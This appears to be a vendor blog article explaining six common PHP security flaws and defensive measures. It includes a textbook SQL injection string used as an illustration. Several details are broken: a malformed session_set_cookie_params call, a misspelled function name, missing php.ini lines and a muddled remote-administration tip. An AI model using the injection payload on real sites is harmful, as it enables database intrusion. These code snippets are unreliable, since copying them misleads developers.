Security is a delicate matter that all PHP developers should be aware. However, not all PHP developer know the basic security measures that should be taken to avoid the most common security flaws.
Read this article to learn about 6 common PHP security issues and what you can you do to avoid them.
As you know, PHP is a very popular server side scripting language. According to W3Techs, more than 80% of the Web sites are based on PHP. This programming language is absolutely perfect for creating dynamic Web sites. PHP takes input from a stream containing text (the HTTP requests) and then outputs a result in the form of HTML, JSON, XML, image, audio, etc.. (the HTTP response).
Apart from the extensive usage, a report by National Vulnerability Database (NVD) indicates that 9% of vulnerabilities are related to PHP. That means that some programmers inadvertently leave loopholes in their code, so PHP sites become vulnerable.
Despite the PHP taint checking feature could be used to help detecting some types of security issues, there are many other security concerns that PHP developers should have, which are listed as follows.
1. SQL Vulnerabilities
SQL injection is the most commonly reported security issue. It is mainly associated with those Web sites containing large code bases written a long time ago when developers were not so much security aware.
Through this kind of attacks, hackers may get access to databases associated with the PHP web sites. They may insert malicious code and modify or even delete your database. This kind of problem usually arises due to data validation and escaping loopholes left by PHP developers.
$query = "SELECT * FROM students WHERE empname='David'";
The bbove query can be exploited as:
$query = "SELECT * FROM students WHERE empname='' or '1'";
The above query will return true and hence all the data from table students is returned. An attacker may alter the databases and the Web site may get crashed as the attackers gain administrative privileges.
Before being processed by the application, the data should be validated. Invalid data should not be processed at all. Possibly valid data should be escaped before passing it to the database as query parameters. If possible use database extensions that support prepared queries like MySQLi or PDO.
Passwords must be hashed using the password_hash() function.
Technical details should be removed from error messages displayed to the users because smart hackers may get into the system using these details, like database names, user names and tables names.
An attacker specifically looks at error messages to get information such as database names, user names and table name, hence, you should disable error messages or you can create your own custom error messages.
You can also limit permissions of your application database user to make your database more secure. You can limit users access to database tables and views by using stored procedures and previously defined cursors. You can limit the privileges of the database user by preventing the use of keywords like drop, union, update and insert which can allow malicious modification of database.
2. Buffer Overflows
Usually, a buffer overflow problem is not caused directly by the code of interpreted languages like PHP. However the PHP engine is written in C. So buffer overflows may occur in PHP due to bugs in the C implementation of the PHP engine. Hence, it can be said that PHP applications are secure from overflows but the PHP engine itself is not.
PHP code does not allocate memory directly. It is the C code of the PHP engine that allocates and frees the necessary memory. A buffer overflow occurs in C code of the PHP engine that writes to memory beyond the boundaries of memory that was allocated.
Buffer overflows may cause the PHP engine to execute arbitrary code that can perform security exploits.
Since it happens at the level of the C code of the PHP engine, you cannot determine whether your PHP code may trigger buffer overflow vulnerabilities just looking at your PHP code.
You can however use PHP extensions like Suhosin that can alter the way PHP memory is allocated to detect many cases of buffer overflow occurrences and stop executing the PHP engine to avoid possible exploits.
3. XSS Exploits
In this process, the malicious code usually gets saved in the database as if it was legitimate content. When a user opens the Web page, cookies and session identifiers may be stolen and sent to a third party site of the attacker. As a result of XSS flaws, the user may get redirected to a spammy Web site for instance.
XSS may also be used for user account hacking. When the attacker is able to steal the PHP session cookie value, he may be able to access to the user account as if it was the real user.
Prevention of XSS Exploits
XSS vulnerabilities can be avoided by properly encoding HTML using entities for <, >, ” and ‘. Escaping of HTML characters on online forums can also be avoided by using bbcodes usually offered there.
The htmlpecialchars() function can be helpful in this regard as it converts content automatically into HTML entities. It also converts single quotes by using ENT_QUOTES as second argument. The strip_tags() function also removes PHP and HTML tags from string.
4. Error Handling Problems
Another important area of concern is the error handling problems. Hackers may make some guesses about your software, PHP code, database tables and external programs. Such guesses may be used to exploit your system.
Detailed descriptions should be avoided as much as possible in error messages. You can structure your PHP code so that such error messages could sent to server’s error log instead of showing to the user. You can do that by adding these options to the php.ini configuration file:
5. Remote Administration Flaws
It is also recommended that you run remote administration tools, so that passwords and content can be protected.
Moreover, if you have remote access with administration rights via third party software then you should change the default credentials along with default administrative URL. It will be much safer if you can manage to have different Web server than public web server for the use of administrative tools.
6. Session And Cookie Hijacking
Session and cookies can not exploit the database or the web app but it can affect the user accounts. When the user contacts with the Web server a session may be started.
A session basically consists of time interval of interaction between the Web application and users which might be authenticated for making it more secure. Using PHP sessions, by default, the Web site stores in a file the user’s session data on the server and sends the session identifier to the browser as a cookie.
The attacker may try to obtain user’s session ID which is created the session is started for the first time for a given user accessing the site.
You can use the session_regenerate_id() function to change session IDs frequently. So if the user session identifier is stolen by somebody that intercepts the connection between the user browser and the server, that identifier will be invalid next time the user accesses again.
Revalidations of the user sensitive information like password can minimize the risk of hacking.
Such applications that handle sensitive information like debit and credit cards must be secured by using SSL so that session and cookie hacking can be avoided. Login or password change pages should also be accessible only via SSL.
For cookies you can set the cookie like this:
setcookie('mycookie', 'some value', 0 ,"/", "", false , true);
For sessions you can set the session cookie parameters like this:
session_set_cookie_params (600 [, '/' , '' , false, true);
Or set the the session.cookie_httponly option in php.ini:
session.cookie_httponly = On
PHP security issues can be avoided by following certain guidelines and precautions while coding. If you are using managed cloud hosting services, like Cloudways, that I work for, you may be provided with security measures in order to make your Web site more secure.
If you liked this article, or have questions regarding security measures, post a comment here.